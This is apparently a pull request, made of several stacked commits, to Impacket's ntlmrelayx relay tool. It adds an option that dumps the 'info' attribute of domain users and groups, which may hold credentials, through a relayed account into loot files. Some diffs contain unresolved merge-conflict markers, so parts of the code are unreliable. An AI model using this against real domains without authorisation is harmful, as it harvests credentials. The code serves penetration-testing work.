### PR TITLE
Added the option "--dump-userinfo" to ntlmrealyx.

### DIFF
--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -195,7 +195,7 @@ def start_servers(options, threads):
         c.setLootdir(options.lootdir)
         c.setOutputFile(options.output_file)
         c.setdumpHashes(options.dump_hashes)
-        c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.dump_adcs, options.sid, options.add_dns_record, options.dump_userinfo)
+        c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.dump_adcs, options.sid, options.add_dns_record, options.dump_info_attr)
         c.setRPCOptions(options.rpc_mode, options.rpc_use_smb, options.auth_smb, options.hashes_smb, options.rpc_smb_port, options.icpr_ca_name)
         c.setMSSQLOptions(options.query)
         c.setInteractive(options.interactive)
@@ -398,7 +398,7 @@ if __name__ == '__main__':
     ldapoptions.add_argument('--dump-laps', action='store_true', required=False, help='Attempt to dump any LAPS passwords readable by the user')
     ldapoptions.add_argument('--dump-gmsa', action='store_true', required=False, help='Attempt to dump any gMSA passwords readable by the user')
     ldapoptions.add_argument('--dump-adcs', action='store_true', required=False, help='Attempt to dump ADCS enrollment services and certificate templates info')
-    ldapoptions.add_argument('--dump-userinfo', action='store_true', required=False, help='Attempt to dump the info attribute of all user accounts (may contain credentials)')
+    ldapoptions.add_argument('--dump-info-attr', action='store_true', required=False, help='Attempt to dump the info attribute of all user and group domain objects (may contain credentials)')
     ldapoptions.add_argument('--add-dns-record', nargs=2, action='store', metavar=('NAME', 'IPADDR'), required=False, help='Add the <NAME> record to DNS via LDAP pointing to <IPADDR>')
 
     #Common options for SMB and LDAP

--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -195,7 +195,7 @@ def start_servers(options, threads):
         c.setLootdir(options.lootdir)
         c.setOutputFile(options.output_file)
         c.setdumpHashes(options.dump_hashes)
-        c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.dump_adcs, options.sid, options.add_dns_record)
+        c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.dump_adcs, options.sid, options.add_dns_record, options.dump_userinfo)
         c.setRPCOptions(options.rpc_mode, options.rpc_use_smb, options.auth_smb, options.hashes_smb, options.rpc_smb_port, options.icpr_ca_name)
         c.setMSSQLOptions(options.query)
         c.setInteractive(options.interactive)
@@ -398,6 +398,7 @@ if __name__ == '__main__':
     ldapoptions.add_argument('--dump-laps', action='store_true', required=False, help='Attempt to dump any LAPS passwords readable by the user')
     ldapoptions.add_argument('--dump-gmsa', action='store_true', required=False, help='Attempt to dump any gMSA passwords readable by the user')
     ldapoptions.add_argument('--dump-adcs', action='store_true', required=False, help='Attempt to dump ADCS enrollment services and certificate templates info')
+    ldapoptions.add_argument('--dump-userinfo', action='store_true', required=False, help='Attempt to dump the info attribute of all user accounts (may contain credentials)')
     ldapoptions.add_argument('--add-dns-record', nargs=2, action='store', metavar=('NAME', 'IPADDR'), required=False, help='Add the <NAME> record to DNS via LDAP pointing to <IPADDR>')
 
     #Common options for SMB and LDAP

--- a/impacket/examples/ntlmrelayx/attacks/ldapattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/ldapattack.py
@@ -1099,16 +1099,6 @@ class LDAPAttack(ProtocolAttack):
                 stamp = datetime.datetime.now().strftime('%Y%m%d_%H%M%S')
                 base = os.path.join(self.config.lootdir, 'domain_objects_info_' + stamp)
 
-<<<<<<< HEAD
-                    # .grep - tab-separated, newlines in values collapsed to spaces
-                    with open(base + '.grep', 'w', encoding='utf-8') as f:
-                        f.write('sAMAccountName\tmemberOf\tinfo\n')
-                        for e in entries:
-                            sam  = e['attributes']['sAMAccountName'] or ''
-                            dn   = e['attributes']['memberOf'] or ''
-                            info = (e['attributes']['info'] or '').replace('\n', ' ').replace('\r', '')
-                            f.write('%s\t%s\t%s\n' % (sam, dn, info))
-=======
                 # .csv - for grepable output with tab delimiter
                 with open(base + '.grep', 'w', encoding='utf-8') as f:
                     writer = csv.writer(f, delimiter='\t')
@@ -1118,7 +1108,6 @@ class LDAPAttack(ProtocolAttack):
                         dn   = e['attributes']['memberOf'] or ''
                         info = (e['attributes']['info'] or '').replace('\n', ' ').replace('\r', '')
                         writer.writerow([sam, dn, info])
->>>>>>> a2b86944 (Renamed option to --dump-info-attr and updated code.)
 
                 # .json - array of dicts
                 with open(base + '.json', 'w', encoding='utf-8') as f:

--- a/impacket/examples/ntlmrelayx/attacks/ldapattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/ldapattack.py
@@ -27,6 +27,8 @@ import re
 import dns.resolver
 import ldap3
 import ldapdomaindump
+import csv
+import html
 from ldap3.core.results import RESULT_UNWILLING_TO_PERFORM
 from ldap3.protocol.microsoft import security_descriptor_control
 from ldap3.protocol.formatters.formatters import format_sid
@@ -1079,23 +1081,25 @@ class LDAPAttack(ProtocolAttack):
                     LOG.info("Successfully dumped %d gMSA passwords through relayed account %s" % (count, self.username))
                     fd.close()
 
-        # Dump user info attributes
-        if self.config.dumpuserinfo:
+        # Dump user and group domain objects info attributes
+        if self.config.dumpinfoattr:
             LOG.info("Attempting to dump user info attributes")
-            success = self.client.search(
+            entries = list(self.client.extend.standard.paged_search(
                 domainDumper.root,
                 '(&(info=*)(|(objectCategory=person)(objectCategory=group)))',
-                search_scope=ldap3.SUBTREE,
-                attributes=['sAMAccountName', 'memberOf', 'info']
-            )
-            if success:
-                entries = [e for e in self.client.response
-                           if e.get('type') == 'searchResEntry' and e['attributes'].get('info')]
-                if not entries:
-                    LOG.info("No user info attributes found readable by %s" % self.username)
-                else:
-                    base = os.path.join(self.config.lootdir, 'domain_users_userinfo')
+                attributes=['sAMAccountName', 'memberOf', 'info'],
+                generator=True,
+            ))
+            entries = [e for e in entries
+                       if e.get('type') == 'searchResEntry' and e.get('raw_attributes', {}).get('info') is not None]
+            if not entries:
+                LOG.info("No user info attributes found readable by %s" % self.username)
+            else:
+                os.makedirs(self.config.lootdir, exist_ok=True)
+                stamp = datetime.datetime.now().strftime('%Y%m%d_%H%M%S')
+                base = os.path.join(self.config.lootdir, 'domain_objects_info_' + stamp)
 
+<<<<<<< HEAD
                     # .grep - tab-separated, newlines in values collapsed to spaces
                     with open(base + '.grep', 'w', encoding='utf-8') as f:
                         f.write('sAMAccountName\tmemberOf\tinfo\n')
@@ -1104,18 +1108,29 @@ class LDAPAttack(ProtocolAttack):
                             dn   = e['attributes']['memberOf'] or ''
                             info = (e['attributes']['info'] or '').replace('\n', ' ').replace('\r', '')
                             f.write('%s\t%s\t%s\n' % (sam, dn, info))
+=======
+                # .csv - for grepable output with tab delimiter
+                with open(base + '.grep', 'w', encoding='utf-8') as f:
+                    writer = csv.writer(f, delimiter='\t')
+                    writer.writerow(['sAMAccountName', 'memberOf', 'info'])
+                    for e in entries:
+                        sam  = e['attributes']['sAMAccountName'] or ''
+                        dn   = e['attributes']['memberOf'] or ''
+                        info = (e['attributes']['info'] or '').replace('\n', ' ').replace('\r', '')
+                        writer.writerow([sam, dn, info])
+>>>>>>> a2b86944 (Renamed option to --dump-info-attr and updated code.)
 
-                    # .json — array of dicts
-                    with open(base + '.json', 'w', encoding='utf-8') as f:
-                        out = [{'sAMAccountName': e['attributes']['sAMAccountName'],
-                                'memberOf': e['attributes']['memberOf'],
-                                'info': e['attributes']['info']}
-                               for e in entries]
-                        json.dump(out, f, indent=2, default=str)
+                # .json - array of dicts
+                with open(base + '.json', 'w', encoding='utf-8') as f:
+                    out = [{'sAMAccountName': e['attributes']['sAMAccountName'],
+                            'memberOf': e['attributes']['memberOf'],
+                            'info': e['attributes']['info']}
+                           for e in entries]
+                    json.dump(out, f, indent=2, default=str)
 
-                    # .html — table matching ldapdomaindump style
+                    # .html - table matching ldapdomaindump style
                     def _he(s):
-                        return str(s).replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;')
+                        return html.escape(str(s))
 
                     with open(base + '.html', 'w', encoding='utf-8') as f:
                         f.write('<!DOCTYPE html><html><head><meta charset="UTF-8"><style>'
@@ -1126,7 +1141,7 @@ class LDAPAttack(ProtocolAttack):
                                 'tr:nth-child(even){background:#f2f2f2}'
                                 '</style></head><body>\n'
                                 '<table><thead>'
-                                '<tr><td colspan="3"><b>Domain users - info attribute</b></td></tr>'
+                                '<tr><td colspan="3"><b>Domain user and group objects - info attribute</b></td></tr>'
                                 '<tr><th>sAMAccountName</th><th>memberOf</th><th>info</th></tr>'
                                 '</thead><tbody>\n')
                         for e in entries:
@@ -1136,8 +1151,7 @@ class LDAPAttack(ProtocolAttack):
                                 _he(e['attributes']['info'])))
                         f.write('</tbody></table></body></html>\n')
 
-                    LOG.info("Dumped info attribute for %d user(s) to %s.{grep,json,html}" % (
-                        len(entries), base))
+                LOG.info("Dumped info attribute for %d domain object(s) to %s.{grep,json,html}" % (len(entries), base))
 
         if not dumpedAdcs and self.config.dumpadcs:
             dumpedAdcs = True

--- a/impacket/examples/ntlmrelayx/attacks/ldapattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/ldapattack.py
@@ -1099,7 +1099,7 @@ class LDAPAttack(ProtocolAttack):
                 stamp = datetime.datetime.now().strftime('%Y%m%d_%H%M%S')
                 base = os.path.join(self.config.lootdir, 'domain_objects_info_' + stamp)
 
-                # .csv - for grepable output with tab delimiter
+                # .grep - for grepable output with tab delimiter
                 with open(base + '.grep', 'w', encoding='utf-8') as f:
                     writer = csv.writer(f, delimiter='\t')
                     writer.writerow(['sAMAccountName', 'memberOf', 'info'])

--- a/impacket/examples/ntlmrelayx/attacks/ldapattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/ldapattack.py
@@ -1096,7 +1096,7 @@ class LDAPAttack(ProtocolAttack):
                 else:
                     base = os.path.join(self.config.lootdir, 'domain_users_userinfo')
 
-                    # .grep — tab-separated, newlines in values collapsed to spaces
+                    # .grep - tab-separated, newlines in values collapsed to spaces
                     with open(base + '.grep', 'w', encoding='utf-8') as f:
                         f.write('sAMAccountName\tmemberOf\tinfo\n')
                         for e in entries:

--- a/impacket/examples/ntlmrelayx/attacks/ldapattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/ldapattack.py
@@ -1079,6 +1079,66 @@ class LDAPAttack(ProtocolAttack):
                     LOG.info("Successfully dumped %d gMSA passwords through relayed account %s" % (count, self.username))
                     fd.close()
 
+        # Dump user info attributes
+        if self.config.dumpuserinfo:
+            LOG.info("Attempting to dump user info attributes")
+            success = self.client.search(
+                domainDumper.root,
+                '(&(objectClass=user)(objectCategory=person)(info=*))',
+                search_scope=ldap3.SUBTREE,
+                attributes=['sAMAccountName', 'distinguishedName', 'info']
+            )
+            if success:
+                entries = [e for e in self.client.response
+                           if e.get('type') == 'searchResEntry' and e['attributes'].get('info')]
+                if not entries:
+                    LOG.info("No user info attributes found readable by %s" % self.username)
+                else:
+                    base = os.path.join(self.config.lootdir, 'domain_users_userinfo')
+
+                    # .grep — tab-separated, newlines in values collapsed to spaces
+                    with open(base + '.grep', 'w', encoding='utf-8') as f:
+                        f.write('sAMAccountName\tdistinguishedName\tinfo\n')
+                        for e in entries:
+                            sam  = e['attributes']['sAMAccountName'] or ''
+                            dn   = e['attributes']['distinguishedName'] or ''
+                            info = (e['attributes']['info'] or '').replace('\n', ' ').replace('\r', '')
+                            f.write('%s\t%s\t%s\n' % (sam, dn, info))
+
+                    # .json — array of dicts
+                    with open(base + '.json', 'w', encoding='utf-8') as f:
+                        out = [{'sAMAccountName': e['attributes']['sAMAccountName'],
+                                'distinguishedName': e['attributes']['distinguishedName'],
+                                'info': e['attributes']['info']}
+                               for e in entries]
+                        json.dump(out, f, indent=2, default=str)
+
+                    # .html — table matching ldapdomaindump style
+                    def _he(s):
+                        return str(s).replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;')
+
+                    with open(base + '.html', 'w', encoding='utf-8') as f:
+                        f.write('<!DOCTYPE html><html><head><meta charset="UTF-8"><style>'
+                                'body{font-family:arial,sans-serif;font-size:12px}'
+                                'table{border-collapse:collapse;width:100%}'
+                                'th,td{border:1px solid #aaa;padding:3px 6px;text-align:left;vertical-align:top}'
+                                'th{background:#336699;color:#fff}'
+                                'tr:nth-child(even){background:#f2f2f2}'
+                                '</style></head><body>\n'
+                                '<table><thead>'
+                                '<tr><td colspan="3"><b>Domain users - info attribute</b></td></tr>'
+                                '<tr><th>sAMAccountName</th><th>distinguishedName</th><th>info</th></tr>'
+                                '</thead><tbody>\n')
+                        for e in entries:
+                            f.write('<tr><td>%s</td><td>%s</td><td>%s</td></tr>\n' % (
+                                _he(e['attributes']['sAMAccountName']),
+                                _he(e['attributes']['distinguishedName']),
+                                _he(e['attributes']['info'])))
+                        f.write('</tbody></table></body></html>\n')
+
+                    LOG.info("Dumped info attribute for %d user(s) to %s.{grep,json,html}" % (
+                        len(entries), base))
+
         if not dumpedAdcs and self.config.dumpadcs:
             dumpedAdcs = True
             self.dumpADCS()

--- a/impacket/examples/ntlmrelayx/attacks/ldapattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/ldapattack.py
@@ -1084,9 +1084,9 @@ class LDAPAttack(ProtocolAttack):
             LOG.info("Attempting to dump user info attributes")
             success = self.client.search(
                 domainDumper.root,
-                '(&(objectClass=user)(objectCategory=person)(info=*))',
+                '(&(info=*)(|(objectCategory=person)(objectCategory=group)))',
                 search_scope=ldap3.SUBTREE,
-                attributes=['sAMAccountName', 'distinguishedName', 'info']
+                attributes=['sAMAccountName', 'memberOf', 'info']
             )
             if success:
                 entries = [e for e in self.client.response
@@ -1098,17 +1098,17 @@ class LDAPAttack(ProtocolAttack):
 
                     # .grep — tab-separated, newlines in values collapsed to spaces
                     with open(base + '.grep', 'w', encoding='utf-8') as f:
-                        f.write('sAMAccountName\tdistinguishedName\tinfo\n')
+                        f.write('sAMAccountName\tmemberOf\tinfo\n')
                         for e in entries:
                             sam  = e['attributes']['sAMAccountName'] or ''
-                            dn   = e['attributes']['distinguishedName'] or ''
+                            dn   = e['attributes']['memberOf'] or ''
                             info = (e['attributes']['info'] or '').replace('\n', ' ').replace('\r', '')
                             f.write('%s\t%s\t%s\n' % (sam, dn, info))
 
                     # .json — array of dicts
                     with open(base + '.json', 'w', encoding='utf-8') as f:
                         out = [{'sAMAccountName': e['attributes']['sAMAccountName'],
-                                'distinguishedName': e['attributes']['distinguishedName'],
+                                'memberOf': e['attributes']['memberOf'],
                                 'info': e['attributes']['info']}
                                for e in entries]
                         json.dump(out, f, indent=2, default=str)
@@ -1127,12 +1127,12 @@ class LDAPAttack(ProtocolAttack):
                                 '</style></head><body>\n'
                                 '<table><thead>'
                                 '<tr><td colspan="3"><b>Domain users - info attribute</b></td></tr>'
-                                '<tr><th>sAMAccountName</th><th>distinguishedName</th><th>info</th></tr>'
+                                '<tr><th>sAMAccountName</th><th>memberOf</th><th>info</th></tr>'
                                 '</thead><tbody>\n')
                         for e in entries:
                             f.write('<tr><td>%s</td><td>%s</td><td>%s</td></tr>\n' % (
                                 _he(e['attributes']['sAMAccountName']),
-                                _he(e['attributes']['distinguishedName']),
+                                _he(e['attributes']['memberOf']),
                                 _he(e['attributes']['info'])))
                         f.write('</tbody></table></body></html>\n')
 

--- a/impacket/examples/ntlmrelayx/utils/config.py
+++ b/impacket/examples/ntlmrelayx/utils/config.py
@@ -192,7 +192,7 @@ class NTLMRelayxConfig:
     def setRandomTargets(self, randomtargets):
         self.randomtargets = randomtargets
 
-    def setLDAPOptions(self, dumpdomain, addda, aclattack, validateprivs, escalateuser, addcomputer, delegateaccess, dumplaps, dumpgmsa, dumpadcs, sid, adddnsrecord, dumpuserinfo):
+    def setLDAPOptions(self, dumpdomain, addda, aclattack, validateprivs, escalateuser, addcomputer, delegateaccess, dumplaps, dumpgmsa, dumpadcs, sid, adddnsrecord, dumpinfoattr):
         self.dumpdomain = dumpdomain
         self.addda = addda
         self.aclattack = aclattack
@@ -205,7 +205,7 @@ class NTLMRelayxConfig:
         self.dumpadcs = dumpadcs
         self.sid = sid
         self.adddnsrecord = adddnsrecord
-        self.dumpuserinfo = dumpuserinfo
+        self.dumpinfoattr = dumpinfoattr
 
     def setMSSQLOptions(self, queries):
         self.queries = queries

--- a/impacket/examples/ntlmrelayx/utils/config.py
+++ b/impacket/examples/ntlmrelayx/utils/config.py
@@ -192,7 +192,7 @@ class NTLMRelayxConfig:
     def setRandomTargets(self, randomtargets):
         self.randomtargets = randomtargets
 
-    def setLDAPOptions(self, dumpdomain, addda, aclattack, validateprivs, escalateuser, addcomputer, delegateaccess, dumplaps, dumpgmsa, dumpadcs, sid, adddnsrecord):
+    def setLDAPOptions(self, dumpdomain, addda, aclattack, validateprivs, escalateuser, addcomputer, delegateaccess, dumplaps, dumpgmsa, dumpadcs, sid, adddnsrecord, dumpuserinfo):
         self.dumpdomain = dumpdomain
         self.addda = addda
         self.aclattack = aclattack
@@ -205,6 +205,7 @@ class NTLMRelayxConfig:
         self.dumpadcs = dumpadcs
         self.sid = sid
         self.adddnsrecord = adddnsrecord
+        self.dumpuserinfo = dumpuserinfo
 
     def setMSSQLOptions(self, queries):
         self.queries = queries


### PR DESCRIPTION
Passing the "--dump-userinfo" option to ntlmrelayx along with "--lootdir" will perform a raw LDAP query and look for user and group domain objects that have any value in the "info" attribute. The results are saved in the directory specified by the "--lootdir" option in three file formats: HTML, JSON, and grepable -- following the file convention from ldapdomaindump.